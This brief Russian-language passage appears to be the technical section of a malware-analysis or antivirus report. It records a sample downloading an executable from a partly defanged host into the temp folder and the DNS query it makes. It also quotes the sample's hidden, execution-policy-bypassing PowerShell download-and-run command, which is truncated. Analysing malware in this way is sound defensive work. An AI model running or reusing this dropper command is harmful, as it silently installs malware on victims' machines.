Техническая информация
- http://fe##lix.com/sip/5609111.exe как %temp+%\newfile.exe
- http://fe##lix.com/sip/5609111.exe
- DNS ASK fe##lix.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://fe##lix.com/sip/5609111.exe',$env:Temp+'\newfile.Exe');(New-Object -com Shell.Application).Shel...' (со скрытым окном)